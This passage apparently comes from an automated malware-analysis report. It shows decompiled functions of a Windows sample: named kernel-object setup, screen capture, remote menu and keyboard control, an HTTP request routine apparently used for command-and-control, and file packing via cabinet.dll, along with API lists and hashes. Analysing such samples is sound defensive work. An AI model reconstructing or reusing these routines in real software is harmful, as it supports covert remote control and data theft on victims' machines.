													E00411CFE( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E00411900(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E0041189A(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E00411CFE(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x422c2c);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

0x00411969
0x0041197c
0x0041197e
0x00411980
0x00411bd7
0x00411bd7
0x00411bd7
0x0041199a
0x0041199d
0x00411a86
0x00411a86
0x00411a89
0x00000000
0x00411a8f
0x00411a94
0x00411aa2
0x00411aa6
0x00411aa8
0x00411aae
0x00411ab1
0x00411bc8
0x00411bc8
0x00000000
0x00411ab7
0x00411ab7
0x00411aba
0x00000000
0x00411ac0
0x00411ac0
0x00411ac3
0x00411adb
0x00411adb
0x00411ade
0x00411ae6
0x00411aec
0x00411af2
0x00000000
0x00411af4
0x00411af4
0x00411afa
0x00000000
0x00411afc
0x00411afc
0x00411b02
0x00411b0a
0x00411b10
0x00411b1e
0x00411b1e
0x00411b20
0x00000000
0x00411b12
0x00411b12
0x00411b18
0x00000000
0x00000000
0x00411b18
0x00000000
0x00000000
0x00000000
0x00411b02
0x00411afa
0x00411af2
0x00411ac5
0x00411ac5
0x00411ac7
0x00411ac9
0x00411acf
0x00411acf
0x00411ad3
0x00000000
0x00411ad5
0x00411ad5
0x00411ad9
0x00411b04
0x00411b04
0x00411b06
0x00411b22
0x00411b26
0x00411b27
0x00411b31
0x00411b39
0x00411b41
0x00411b47
0x00411b49
0x00411b4b
0x00411b4f
0x00411b54
0x00411b56
0x00411b58
0x00411b5b
0x00411b82
0x00411b8d
0x00411b98
0x00411b99
0x00411ba5
0x00411ba6
0x00411bad
0x00411bbc
0x00411b5d
0x00411b5d
0x00411b60
0x00411b64
0x00411b68
0x00411b69
0x00411b6e
0x00411b71
0x00411b76
0x00411b77
0x00411b79
0x00411b7e
0x00411b80
0x00000000
0x00000000
0x00411b80
0x00411b60
0x00411b5b
0x00411b56
0x00411bc4
0x00411bc9
0x00411bcb
0x00000000
0x00000000
0x00000000
0x00411ad9
0x00411acb
0x00411acb
0x00411acd
0x00000000
0x00000000
0x00000000
0x00000000
0x00411acd
0x00411ac9
0x00411ac3
0x00411aba
0x00411ab1
0x00411bd0
0x00000000
0x00411bd0
0x004119a3
0x004119a5
0x004119af
0x004119c0
0x00000000
0x004119c6
0x004119c6
0x004119c8
0x004119cb
0x004119ce
0x00000000
0x004119d4
0x004119d4
0x004119d4
0x004119da
0x00000000
0x00000000
0x004119e4
0x00000000
0x004119ea
0x004119ea
0x004119ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004119ed
0x00000000
0x004119e4
0x004119f1
0x00000000
0x004119ff
0x00411a0a
0x00411a0e
0x00000000
0x00411a14
0x00411a19
0x00411a1e
0x00411a2c
0x00411a30
0x00411a48
0x00411a48
0x00411a4b
0x00411a50
0x00411a63
0x00411a68
0x00411a52
0x00411a56
0x00411a5b
0x00411a5b
0x00411a6e
0x00411a32
0x00411a3a
0x00411a3e
0x00000000
0x00411a40
0x00411a41
0x00411a41
0x00411a3e
0x00411a70
0x00411a74
0x00411a79
0x00411a7f
0x00411a7f
0x00411a0e
0x004119f1
0x004119ce
0x00000000
0x00000000
0x00000000
0x004119af
0x0041199d
0x00411bd9
0x00411bdf

APIs

EnterCriticalSection.KERNEL32(00422C2C,0000FDE9,?), ref: 00411A1E
LeaveCriticalSection.KERNEL32(00422C2C,?,000000FF), ref: 00411A79
EnterCriticalSection.KERNEL32(00422C2C), ref: 00411A94
#5.WS2_32 ref: 00411B41

Strings

D, xrefs: 00411AD5
W, xrefs: 00411ACF
Z\BU, xrefs: 00411B0A
U, xrefs: 00411A48
\[FS, xrefs: 004119AA
EAPU, xrefs: 00411B12
YIPR, xrefs: 004119B1
YIPW, xrefs: 00411AFC
OMBU, xrefs: 00411AF4
]QSD, xrefs: 00411AEC
, xrefs: 004119BC

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Leave
String ID: $D$EAPU$OMBU$U$W$YIPR$YIPW$Z\BU$\[FS$]QSD
API String ID: 2801635615-1153246223
Opcode ID: 070a577a1e4237049f55bc1f498b1bce3b1e777d4035d60b6598a80317653ccf
Instruction ID: 89fc5902602c07329043c7ca2f1b6e6373b8230471df5728d0ee075ea96daf00
Opcode Fuzzy Hash: 070a577a1e4237049f55bc1f498b1bce3b1e777d4035d60b6598a80317653ccf
Instruction Fuzzy Hash: BD514431A08751AADF309B26CC817EB7B945F02758F04451BEBA4972B1E72CADC1C38E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B81B, Relevance: 25.7, APIs: 17, Instructions: 205
filewindowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B81B(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v5;
				struct HDC__* _v12;
				char _v16;
				short _v124;
				void* _v134;
				char _v612;
				char _v1087;
				char _v1372;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E00411DB1(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E0041C9FB(0x84889911,  &_v124, 0);
					_t66 = RegisterWindowMessageW( &_v124);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E0041C9FB(0x84889912,  &_v124, 1);
					_t71 = CreateEventW(0x423b98, 1, 0,  &_v124);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E0041C9FB(0x18782822,  &_v124, 1);
					_t75 = CreateMutexW(0x423b98, 0,  &_v124);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E0041C9FB(0x9878a222,  &_v124, 1);
					_t79 = CreateFileMappingW(0, 0x423b98, 4, 0, 0x3d09128,  &_v124);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v5 = 0;
					_t82 = GetDC(0);
					_v12 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v5;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v12, 0xa);
					_t21 =  &(_t124[0xb]); // 0x0
					_t118 =  *_t21;
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v12,  *_t21, _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x422938
						_t87 = E004182AC(_t118, _t120, __eflags, _v12,  &_v16, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v12);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v16;
						_t90 =  *(_v16 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t33 =  &(_t124[0xb]); // 0x0
						_t92 = (_t90 & 0x000000ff) *  *_t33;
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E00411CFE(_t119);
						__eflags = _a4 - 1;
						_v5 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v5 = 0;
						E0041CCD2( &_v1372);
						E0041CCFF(_t119,  &_v612);
						_t43 =  &(_t124[0xf]); // 0x422954
						E00411D3A(_t43, 0x423dd8, 0x10);
						_t124[0x13] = _v134;
						_t47 =  &(_t124[0x14]); // 0x422968
						E00411D3A(_t47,  &_v1087, 0x102);
						E0041C9FB(0x1898b122,  &_v124, 1);
						_t107 = CreateMutexW(0x423b98, 0,  &_v124);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t55 =  &(_t124[0x55]); // 0x0
									_t112 = SelectObject( *_t55, _t111);
									_t124[0x56] = _t112;
									__eflags = _t112;
									if(_t112 != 0) {
										_v5 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x0040b81b
0x0040b81b
0x0040b82f
0x0040b834
0x0040b83a
0x0040b840
0x0040b853
0x0040b85c
0x0040b862
0x0040b865
0x0040b867
0x00000000
0x00000000
0x0040b874
0x0040b886
0x0040b88c
0x0040b88f
0x0040b891
0x00000000
0x00000000
0x0040b89e
0x0040b8a9
0x0040b8af
0x0040b8b2
0x0040b8b4
0x00000000
0x00000000
0x0040b8c1
0x0040b8d4
0x0040b8da
0x0040b8dc
0x0040b8de
0x00000000
0x00000000
0x0040b8ea
0x0040b8f0
0x0040b8f2
0x00000000
0x00000000
0x0040b8f8
0x0040b901
0x0040b904
0x0040b907
0x0040b90d
0x0040b910
0x0040b912
0x0040ba7d
0x00000000
0x0040ba7d
0x0040b921
0x0040b924
0x0040b92e
0x0040b931
0x0040b933
0x0040b933
0x0040b941
0x0040b946
0x0040b948
0x0040b95f
0x0040b95f
0x0040b94a
0x0040b94d
0x0040b958
0x0040b958
0x0040b964
0x0040b968
0x0040b96e
0x0040b971
0x0040b977
0x0040b97e
0x0040b982
0x0040b988
0x0040b988
0x0040b98c
0x0040b98f
0x0040b991
0x0040b996
0x0040b996
0x0040b996
0x0040b99a
0x0040b99d
0x0040b9a2
0x0040b9a6
0x0040b9aa
0x00000000
0x00000000
0x0040b9b6
0x0040b9b9
0x0040b9c5
0x0040b9d1
0x0040b9d5
0x0040b9e0
0x0040b9ef
0x0040b9f3
0x0040ba03
0x0040ba12
0x0040ba18
0x0040ba1e
0x0040ba20
0x00000000
0x00000000
0x0040ba27
0x0040ba2d
0x0040ba30
0x0040ba32
0x0040ba35
0x0040ba3b
0x0040ba41
0x0040ba43
0x0040ba4c
0x0040ba4e
0x0040ba54
0x0040ba56
0x0040ba59
0x0040ba5f
0x0040ba65
0x0040ba6b
0x0040ba6d
0x0040ba6f
0x0040ba6f
0x0040ba6d
0x0040ba56
0x0040ba77
0x0040ba77
0x0040ba32
0x00000000
0x0040b971
0x0040b842
0x00000000

APIs

TlsAlloc.KERNEL32(00422918,00000000,0000018C,00000000,00000000), ref: 0040B834
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040B85C
CreateEventW.KERNEL32(00423B98,00000001,00000000,?,84889912,?,00000001), ref: 0040B886
CreateMutexW.KERNEL32(00423B98,00000000,?,18782822,?,00000001), ref: 0040B8A9
CreateFileMappingW.KERNEL32(00000000,00423B98,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040B8D4
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040B8EA
GetDC.USER32(00000000), ref: 0040B907
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040B927
GetDeviceCaps.GDI32(?,0000000A), ref: 0040B931
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040B944

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID:
API String ID: 3765073151-0
Opcode ID: 1920a14c2de5aee5aa6ae3e32525a63148e3ce777c176758046c3397dcb2788e
Instruction ID: ea774b8f74f765c220f51346cb63b8329dac9040d0a26255887830c7b82d441a
Opcode Fuzzy Hash: 1920a14c2de5aee5aa6ae3e32525a63148e3ce777c176758046c3397dcb2788e
Instruction Fuzzy Hash: 267142B1944644AFDB20AFB08C84EEA7BECEB04304F50493EF542E26A1D77999858F58

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF5F, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BF5F(void _a4) {
				long _v12;
				void* _v16;
				void* _v20;
				char _v22;
				short _v24;
				char* _v32;
				char* _v36;
				intOrPtr _v40;
				void* _v44;
				char _v56;
				char _v64;
				char _v548;
				char _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t97;
				char* _t99;
				intOrPtr* _t106;
				void* _t109;
				intOrPtr* _t110;
				void* _t114;

				_t106 = _a4;
				if(E00416767( &_v36,  *((intOrPtr*)(_t106 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x423dd4, 0, 0, 0, 0);
				_v44 = _t53;
				if(_t53 == 0) {
					L24:
					E00411CFE(_v36);
					E00411CFE(_v32);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v36, _v24, 0, 0, 3, 0, 0);
				_v20 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v44);
					goto L24;
				}
				_t58 =  *_t106;
				_t99 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t99 = "GET";
				}
				_t97 = HttpOpenRequestA(_v20, _t99, _v32, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v22 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v16 = _t97;
				if(_t97 == 0) {
					L22:
					InternetCloseHandle(_v20);
					goto L23;
				} else {
					E0041CCFF(_t99,  &_v552);
					_t63 = 0xe;
					E00419861(_t63,  &_v64);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E00412AC2( &_v12,  &_v64,  *((intOrPtr*)(_t66 + 0x1c)));
						_t114 = _t114 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
							E00411CFE(_v12);
						}
					}
					_t67 = 0xf;
					E00419861(_t67,  &_v56);
					_v40 = E0041284D( &_v548);
					_t109 = E00411CCE(2 + _t69 * 6);
					if(_t109 == 0) {
						_t109 = 0;
					} else {
						E00416A92(_t109,  &_v548, _v40);
						_t97 = _v16;
					}
					if(_t109 != 0 && E00412AC2( &_v12,  &_v56, _t109) > 0) {
						HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
						E00411CFE(_v12);
					}
					E00411CFE(_t109);
					_t110 = _a4;
					if(HttpSendRequestA(_t97, 0, 0,  *( *_t110 + 0x24),  *( *_t110 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t97);
						goto L22;
					} else {
						_v12 = 4;
						_a4 = 0;
						if(HttpQueryInfoA(_t97, 0x20000013,  &_a4,  &_v12, 0) != 1 || _a4 != 0xc8) {
							goto L21;
						} else {
							if(E00413E34( &_v12, _t97) != 0) {
								E00411CFE(_t80);
							}
							E00411CFE(_v36);
							E00411CFE(_v32);
							 *(_t110 + 8) = _v16;
							goto L25;
						}
					}
				}
			}

0x0041bf6b
0x0041bf7b
0x0041c16f
0x0041c173
0x0041c173
0x0041bf8d
0x0041bf93
0x0041bf98
0x0041c15d
0x0041c160
0x0041c168
0x00000000
0x0041c168
0x0041bfab
0x0041bfb1
0x0041bfb6
0x0041c154
0x0041c157
0x00000000
0x0041c157
0x0041bfbc
0x0041bfc2
0x0041bfc7
0x0041bfc9
0x0041bfc9
0x0041bffc
0x0041bffe
0x0041c003
0x0041c14b
0x0041c14e
0x00000000
0x0041c009
0x0041c010
0x0041c01a
0x0041c01b
0x0041c023
0x0041c028
0x0041c034
0x0041c039
0x0041c03e
0x0041c04b
0x0041c054
0x0041c054
0x0041c03e
0x0041c05e
0x0041c05f
0x0041c06f
0x0041c07d
0x0041c081
0x0041c099
0x0041c083
0x0041c08f
0x0041c094
0x0041c094
0x0041c09d
0x0041c0bf
0x0041c0c8
0x0041c0c8
0x0041c0ce
0x0041c0d3
0x0041c0ea
0x0041c144
0x0041c145
0x00000000
0x0041c0ec
0x0041c0fb
0x0041c102
0x0041c10e
0x00000000
0x0041c119
0x0041c124
0x0041c127
0x0041c127
0x0041c12f
0x0041c137
0x0041c13f
0x00000000
0x0041c13f
0x0041c10e
0x0041c0ea

APIs

Part of subcall function 00416767: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00416796

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 0041BF8D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0041BFAB
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 0041BFF6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0041C04B
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0041C0BF
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0041C0E1
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 0041C105
InternetCloseHandle.WININET(00000000), ref: 0041C145
InternetCloseHandle.WININET(?), ref: 0041C14E

Part of subcall function 00413E34: InternetQueryOptionA.WININET(-00422ABC,00000022,00000000,?), ref: 00413E48
Part of subcall function 00413E34: GetLastError.KERNEL32 ref: 00413E52
Part of subcall function 00413E34: InternetQueryOptionA.WININET(00000022,00000022,00000000,?), ref: 00413E72

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

InternetCloseHandle.WININET(?), ref: 0041C157

Strings

HTTP/1.1, xrefs: 0041BFEA
POST, xrefs: 0041BFC2
GET, xrefs: 0041BFC9, 0041BFF2

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: 5b39da0a87764aacb01a3214d3de9b7f8f2d9f413472be06776d42dd61207aad
Instruction ID: 69841bee5363271bd62e5e2e84413da6c62377a3aefec334177c663af5307683
Opcode Fuzzy Hash: 5b39da0a87764aacb01a3214d3de9b7f8f2d9f413472be06776d42dd61207aad
Instruction Fuzzy Hash: 04518371940129BBCB21AFA1CD85EDF7F79EF09354F104426F505B6172D7389A80CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD4D, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BD4D(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x422928);
					L23:
					SetEvent( *0x422924);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E004066DB( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x422918, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x422928; // 0x0
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}

0x0040bd4d
0x0040bd53
0x0040bd5c
0x0040bd5f
0x0040bede
0x0040bee4
0x0040beea
0x0040bef8
0x0040bef8
0x0040bd65
0x0040bead
0x0040beb9
0x0040bec9
0x0040becd
0x0040bed1
0x00000000
0x0040bd74
0x0040bd7d
0x0040bd81
0x00000000
0x00000000
0x0040bd87
0x0040bd8d
0x0040bd93
0x0040bd95
0x0040bda0
0x0040bdc6
0x0040bdc6
0x0040bdcb
0x0040bde1
0x0040bde6
0x00000000
0x00000000
0x0040bdf5
0x0040bdfd
0x0040bdff
0x0040bdff
0x0040be0f
0x0040be19
0x0040be2f
0x0040be7e
0x0040be86
0x0040be8f
0x00000000
0x00000000
0x0040be91
0x0040be9f
0x00000000
0x0040be9f
0x0040be80
0x00000000
0x0040be80
0x0040be39
0x0040be3d
0x0040be6e
0x0040be6e
0x0040be3d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bda2
0x0040bda2
0x0040bdad
0x0040bdb5
0x0040bdbb
0x0040bdbb
0x0040bdbf
0x0040bdc0
0x00000000
0x0040bda2

APIs

GetMenu.USER32(?), ref: 0040BD77
GetMenuItemCount.USER32 ref: 0040BD8D
GetMenuState.USER32 ref: 0040BDA5
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0040BDB5
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040BDDB
GetMenuState.USER32 ref: 0040BDEF
EndMenu.USER32 ref: 0040BDFF
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0040BE0F
GetSubMenu.USER32 ref: 0040BE33
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0040BE4D
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0040BE6E
GetMenuItemID.USER32(00000000,00000000), ref: 0040BE86
SendMessageW.USER32(?,00000111,?,00000000), ref: 0040BE9F
SetKeyboardState.USER32 ref: 0040BEDE
SetEvent.KERNEL32 ref: 0040BEEA

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: d6c3eb12cd40d97ec6dc1a2f8b9c68d49b86bf915e96cf6cc3d85c3d68eb353d
Instruction ID: 693e90f1b73ffe5754aca1f3c3e1b7ba975239454486425e04991a42f8622c9e
Opcode Fuzzy Hash: d6c3eb12cd40d97ec6dc1a2f8b9c68d49b86bf915e96cf6cc3d85c3d68eb353d
Instruction Fuzzy Hash: 1C418770100305ABD7119F25DD88ABF7AA8EB85764F04463AFAA5B12F0C7388D459BED

Uniqueness

Uniqueness Score: -1.00%

Function 004159E8, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004159E8() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t18;

				if( *0x423a2c != 0) {
					L9:
					 *0x423a2c =  *0x423a2c + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x423a28 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x423054 = GetProcAddress(_t2, "FCICreate");
						 *0x423a18 = GetProcAddress( *0x423a28, "FCIAddFile");
						 *0x422c4c = GetProcAddress( *0x423a28, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x423a28, "FCIDestroy");
						 *0x423a20 = _t7;
						if( *0x423054 == 0 ||  *0x423a18 == 0) {
							L7:
							FreeLibrary( *0x423a28);
							goto L8;
						} else {
							_t18 =  *0x422c4c; // 0x0
							if(_t18 == 0 || _t7 == 0) {
								goto L7;
							} else {
								_t9 = HeapCreate(0, 0x80000, 0);
								 *0x422c48 = _t9;
								if(_t9 != 0) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
				}
			}

0x004159f1
0x00415a9c
0x00415a9c
0x00415aa5
0x004159f7
0x004159fc
0x00415a02
0x00415a09
0x00415a98
0x00415a9b
0x00415a0f
0x00415a29
0x00415a3b
0x00415a4d
0x00415a52
0x00415a54
0x00415a60
0x00415a8c
0x00415a92
0x00000000
0x00415a6a
0x00415a6a
0x00415a70
0x00000000
0x00415a76
0x00415a7d
0x00415a83
0x00415a8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00415a8a
0x00415a70
0x00415a60
0x00415a09

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,00415ACF,?,00415CEB,?,?,00000000,?), ref: 004159FC
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00415A1C
GetProcAddress.KERNEL32(FCIAddFile), ref: 00415A2E
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00415A40
GetProcAddress.KERNEL32(FCIDestroy), ref: 00415A52
HeapCreate.KERNEL32(00000000,00080000,00000000,00415CEB,?,?,00000000,?), ref: 00415A7D
FreeLibrary.KERNEL32(00415CEB,?,?,00000000,?), ref: 00415A92

Strings

cabinet.dll, xrefs: 004159F7
FCIFlushCabinet, xrefs: 00415A30
FCIAddFile, xrefs: 00415A1E
FCICreate, xrefs: 00415A16
FCIDestroy, xrefs: 00415A42

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: c1415b4bfafd8665eeda592417042593af9440ed0628c2eb29a1526b59e624d6
Instruction ID: 505cd38ddb04d1cb2d12e237c462345e0bb063a75df8d865628f23ac7617d8d9
Opcode Fuzzy Hash: c1415b4bfafd8665eeda592417042593af9440ed0628c2eb29a1526b59e624d6
Instruction Fuzzy Hash: F511E830B90A10FACB319F65FD4859A7FB8A6887633A40637E444A3674DA7D46828F5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE2A, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040FE2A(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				void* _v60;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				void* _v96;
				intOrPtr _v104;
				signed int _v108;
				void* _v112;
				void* _v132;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				void* _t207;

				_t207 = (_t205 & 0xfffffff8) - 0x5c;
				if(E0041CB59() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x422acc(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x422adc);
					_t192 = _a4;
					_t184 = E0040EEAE(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
